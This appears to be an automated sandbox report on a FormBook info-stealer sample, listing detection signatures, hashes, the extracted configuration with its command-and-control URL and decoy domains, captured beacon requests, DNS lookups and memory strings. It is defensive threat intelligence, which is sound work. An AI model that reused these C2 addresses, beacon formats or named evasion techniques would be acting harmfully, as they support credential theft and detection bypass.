Windows Analysis Report
SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe

Overview

General Information

Sample name:	SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe
Analysis ID:	1482965
MD5:	01fbcc6559c010e59be1dc7b66c12e4f
SHA1:	657f058d4032447658f71265803f7a6d52a64532
SHA256:	ee7dd9158f6175700aa6d58f346036f949889f8deebf8dbee83c40874bbc1f26
Tags:	exeFormbook
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Scheduled temp file as task from temp location

System process connects to network (likely due to code injection or exploit)

Yara detected AntiVM3

Yara detected FormBook

.NET source code contains potential unpacker

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

Allocates memory in foreign processes

C2 URLs / IPs found in malware configuration

Found direct / indirect Syscall (likely to bypass EDR)

Injects a PE file into a foreign processes

Loading BitLocker PowerShell Module

Machine Learning detection for dropped file

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Performs DNS queries to domains with low reputation

Queues an APC in another process (thread injection)

Sample uses process hollowing technique

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Sigma detected: Rundll32 Execution Without CommandLine Parameters

Tries to detect virtualization through RDTSC time measurements

Uses schtasks.exe or at.exe to add and modify task schedules

Writes to foreign memory regions

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Powershell Defender Exclusion

Sigma detected: Suspicious Add Scheduled Task Parent

Sigma detected: Suspicious Schtasks From Env Var Folder

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Malware Threat Intel
Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://0xmrmagnezi.github.io/malware%20analysis/FormBook/ https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Signatures

AV Detection

Antivirus / Scanner detection for submitted sample

Source: SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe

Avira: detected

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe

Avira: detection malicious, Label: HEUR/AGEN.1357443

Found malware configuration

Source: 00000000.00000002.2158917960.0000000003E08000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: FormBook {"C2 list": ["www.dunia188j.store/gy15/"], "decoy": ["yb40w.top", "286live.com", "poozonlife.com", "availableweedsonline.com", "22926839.com", "petlovepet.fun", "halbaexpress.com", "newswingbd.com", "discountdesh.com", "jwoalhbn.xyz", "dandevonald.com", "incrediblyxb.christmas", "ailia.pro", "ga3ki3.com", "99812.photos", "richiecom.net", "ummahskills.online", "peakleyva.store", "a1cbloodtest.com", "insurancebygarry.com", "onz-cg3.xyz", "erektiepil.com", "hs-steuerberater.info", "20allhen.online", "mariaslakedistrict.com", "losterrrcossmpm.com", "tmb6x.rest", "bagelsliders.com", "njoku.net", "tatoways.com", "jmwmanglobalsolutionscom.com", "midnightemporium.shop", "gunaihotels.com", "midsouthhealthcare.com", "rtptt80.site", "carmen-asa.com", "gypsyjudyscott.com", "djkleel.com", "sophhia.site", "tqqft8l5.xyz", "00050385.xyz", "oiupa.xyz", "purenutrixion.com", "worldinfopedia.com", "8886493.com", "1e0bfijiz43k6c8.skin", "bunkerlabsgolf.com", "twinportslocal.com", "ttyijlaw.com", "poiulkj.top", "yuejiazy888.com", "betbox2347.com", "gettingcraftywitro.com", "mantap303game.icu", "skillspartner.net", "cbla.info", "rs-alohafactorysaleuua.shop", "bt365434.com", "redrivercompany.store", "abc8win5.com", "46431.club", "vivehogar.net", "menloparkshop.com", "1776biz.live"]}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe

ReversingLabs: Detection: 27%

Multi AV Scanner detection for submitted file

Source: SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	ReversingLabs: Detection: 27%
Source: SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Virustotal: Detection: 24%			Perma Link

Yara detected FormBook

Source: Yara match	File source: 13.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2158917960.0000000003E08000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2187373051.0000000003D79000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2215621019.0000000002990000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.4570995499.00000000049D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.4570871101.00000000049A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.4569825171.0000000002B50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2198814093.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe

Joe Sandbox ML: detected

Uses 32bit PE files

Source: SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: RegSvcs.pdb, source: explorer.exe, 00000009.00000002.4590979961.00000000108EF000.00000004.80000000.00040000.00000000.sdmp, rundll32.exe, 0000000F.00000002.4572804432.000000000515F000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 0000000F.00000002.4570178116.0000000002E72000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: RegSvcs.exe, 0000000D.00000002.2203912314.0000000001210000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000003.2199275035.00000000048AE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000003.2203034931.0000000004A5B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000002.4571590933.0000000004C10000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000002.4571590933.0000000004DAE000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000011.00000002.2216235525.0000000004CBE000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000011.00000003.2209210659.00000000047CA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000011.00000002.2216235525.0000000004B20000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000011.00000003.2212610111.000000000497A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: rundll32.pdb source: RegSvcs.exe, 00000007.00000002.2210069743.0000000000BD8000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.2203786383.0000000001150000.00000040.10000000.00040000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.2203216556.0000000000DA7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, rundll32.exe, 0000000F.00000002.4569435978.0000000000720000.00000040.80000000.00040000.00000000.sdmp, rundll32.exe, 00000011.00000002.2215447708.0000000000720000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: RegSvcs.exe, RegSvcs.exe, 0000000D.00000002.2203912314.0000000001210000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, rundll32.exe, 0000000F.00000003.2199275035.00000000048AE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000003.2203034931.0000000004A5B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000002.4571590933.0000000004C10000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000002.4571590933.0000000004DAE000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000011.00000002.2216235525.0000000004CBE000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000011.00000003.2209210659.00000000047CA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000011.00000002.2216235525.0000000004B20000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000011.00000003.2212610111.000000000497A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: rundll32.pdbGCTL source: RegSvcs.exe, 00000007.00000002.2210069743.0000000000BD8000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.2203786383.0000000001150000.00000040.10000000.00040000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.2203216556.0000000000DA7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000F.00000002.4569435978.0000000000720000.00000040.80000000.00040000.00000000.sdmp, rundll32.exe, 00000011.00000002.2215447708.0000000000720000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: dKJy.pdbSHA256 source: SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe, KfYvtUBOq.exe.0.dr
Source:	Binary string: RegSvcs.pdb source: explorer.exe, 00000009.00000002.4590979961.00000000108EF000.00000004.80000000.00040000.00000000.sdmp, rundll32.exe, 0000000F.00000002.4572804432.000000000515F000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 0000000F.00000002.4570178116.0000000002E72000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: dKJy.pdb source: SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe, KfYvtUBOq.exe.0.dr

Found inlined nop instructions (likely shell or obfuscated code)

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Code function: 4x nop then jmp 0730ED1Ch	0_2_0730E3D9
Source: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe	Code function: 4x nop then jmp 0730E01Ch	8_2_0730D6D9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then pop edi	13_2_0040E41E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then pop edi	13_2_0040E43D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4x nop then pop edi	15_2_02B5E43D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4x nop then pop edi	15_2_02B5E41E

Networking

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 157.53.227.1 80			Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 172.67.134.182 80			Jump to behavior

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: www.dunia188j.store/gy15/

Performs DNS queries to domains with low reputation

Source:	DNS query: www.tqqft8l5.xyz
Source:	DNS query: www.jwoalhbn.xyz

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET /gy15/?RzuTsp=Y/N4KrVAXY1kocpgzu8WnG77ol+AHv4xLUA59fG9L70w7yqxHWlTkc1yvlLlDHtztMKBj2yhyA==&hL08qP=ojn0sl HTTP/1.1Host: www.dandevonald.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /gy15/?RzuTsp=ojuzNIgvg1BwHmAcToIecm58HYsz0PWD/adWnxcLSOv/0CtFh7ct+QMG65Nx8hG2JCp7w1BwJA==&hL08qP=ojn0sl HTTP/1.1Host: www.carmen-asa.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /gy15/?RzuTsp=XHNRiWOL6AKBRIWnLgJD49myVGc8KkvpE41aN949WbE5iIv/qrJ/+jvCIwl+PYhctV8eVI3XMQ==&hL08qP=ojn0sl HTTP/1.1Host: www.rs-alohafactorysaleuua.shopConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

IP address seen in connection with other malware

Source: Joe Sandbox View

IP Address: 3.33.130.190 3.33.130.190

Internet Provider seen in connection with other malware

Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View	ASN Name: NETACTUATEUS NETACTUATEUS
Source: Joe Sandbox View	ASN Name: AMAZONEXPANSIONGB AMAZONEXPANSIONGB

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Windows\explorer.exe

Code function: 9_2_0E396F82 getaddrinfo,setsockopt,recv,

9_2_0E396F82

Source: global traffic	HTTP traffic detected: GET /gy15/?RzuTsp=Y/N4KrVAXY1kocpgzu8WnG77ol+AHv4xLUA59fG9L70w7yqxHWlTkc1yvlLlDHtztMKBj2yhyA==&hL08qP=ojn0sl HTTP/1.1Host: www.dandevonald.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /gy15/?RzuTsp=ojuzNIgvg1BwHmAcToIecm58HYsz0PWD/adWnxcLSOv/0CtFh7ct+QMG65Nx8hG2JCp7w1BwJA==&hL08qP=ojn0sl HTTP/1.1Host: www.carmen-asa.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /gy15/?RzuTsp=XHNRiWOL6AKBRIWnLgJD49myVGc8KkvpE41aN949WbE5iIv/qrJ/+jvCIwl+PYhctV8eVI3XMQ==&hL08qP=ojn0sl HTTP/1.1Host: www.rs-alohafactorysaleuua.shopConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: global traffic	DNS traffic detected: DNS query: www.dandevonald.com
Source: global traffic	DNS traffic detected: DNS query: www.carmen-asa.com
Source: global traffic	DNS traffic detected: DNS query: www.rs-alohafactorysaleuua.shop
Source: global traffic	DNS traffic detected: DNS query: www.tqqft8l5.xyz
Source: global traffic	DNS traffic detected: DNS query: www.jwoalhbn.xyz
Source: global traffic	DNS traffic detected: DNS query: www.99812.photos
Source: global traffic	DNS traffic detected: DNS query: www.20allhen.online
Source: global traffic	DNS traffic detected: DNS query: www.ttyijlaw.com
Source: global traffic	DNS traffic detected: DNS query: www.incrediblyxb.christmas
Source: global traffic	DNS traffic detected: DNS query: www.dunia188j.store
Source: global traffic	DNS traffic detected: DNS query: www.midsouthhealthcare.com
Source: global traffic	DNS traffic detected: DNS query: www.286live.com

Source: explorer.exe, 00000009.00000000.2148011571.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4578457861.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2148011571.000000000978C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4578457861.000000000978C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: explorer.exe, 00000009.00000000.2148011571.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4578457861.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2148011571.000000000978C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4578457861.000000000978C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: explorer.exe, 00000009.00000000.2148011571.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4578457861.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2148011571.000000000978C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4578457861.000000000978C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: explorer.exe, 00000009.00000000.2148011571.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4578457861.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2148011571.000000000978C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4578457861.000000000978C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: explorer.exe, 00000009.00000002.4578457861.000000000962B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2148011571.000000000962B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
Source: explorer.exe, 00000009.00000002.4572315020.00000000028A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000009.00000000.2145350381.0000000007B60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000009.00000000.2145316957.0000000007B50000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://schemas.micro
Source: SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe, 00000000.00000002.2158150951.0000000002DE6000.00000004.00000800.00020000.00000000.sdmp, KfYvtUBOq.exe, 00000008.00000002.2186011893.0000000002D96000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.20allhen.online
Source: explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.20allhen.online/gy15/
Source: explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.20allhen.online/gy15/www.ttyijlaw.com
Source: explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.20allhen.onlineReferer:
Source: explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.286live.com
Source: explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.286live.com/gy15/
Source: explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.286live.com/gy15/www.vivehogar.net
Source: explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.286live.comReferer:
Source: explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.99812.photos
Source: explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.99812.photos/gy15/
Source: explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.99812.photos/gy15/www.20allhen.online
Source: explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.99812.photosReferer:
Source: explorer.exe, 00000009.00000003.2980175213.000000000C406000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2980659407.000000000C40C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979452129.000000000C3F0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2160546176.000000000C3F2000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.carmen-asa.com
Source: explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.carmen-asa.com/gy15/
Source: explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.carmen-asa.com/gy15/www.rs-alohafactorysaleuua.shop
Source: explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.carmen-asa.comReferer:
Source: explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.dandevonald.com
Source: explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.dandevonald.com/gy15/
Source: explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.dandevonald.com/gy15/www.carmen-asa.com
Source: explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.dandevonald.comReferer:
Source: explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.dunia188j.store
Source: explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.dunia188j.store/gy15/
Source: explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.dunia188j.store/gy15/www.midsouthhealthcare.com
Source: explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.dunia188j.storeReferer:
Source: explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.incrediblyxb.christmas
Source: explorer.exe, 00000009.00000002.4590979961.0000000010DDF000.00000004.80000000.00040000.00000000.sdmp, rundll32.exe, 0000000F.00000002.4572804432.000000000564F000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: http://www.incrediblyxb.christmas/:80gy15?RzuTsp=0BfZhhXj03xBTAibP1YuAxS
Source: explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.incrediblyxb.christmas/gy15/
Source: explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.incrediblyxb.christmas/gy15/www.dunia188j.store
Source: explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.incrediblyxb.christmasReferer:
Source: explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.insurancebygarry.com
Source: explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.insurancebygarry.com/gy15/
Source: explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.insurancebygarry.com/gy15/www.mariaslakedistrict.com
Source: explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.insurancebygarry.comReferer:
Source: explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.jwoalhbn.xyz
Source: explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.jwoalhbn.xyz/gy15/
Source: explorer.exe, 00000009.00000002.4589123071.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2979514252.000000000C4C7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.jwoalhbn.xyz/gy15/www.99812.photos
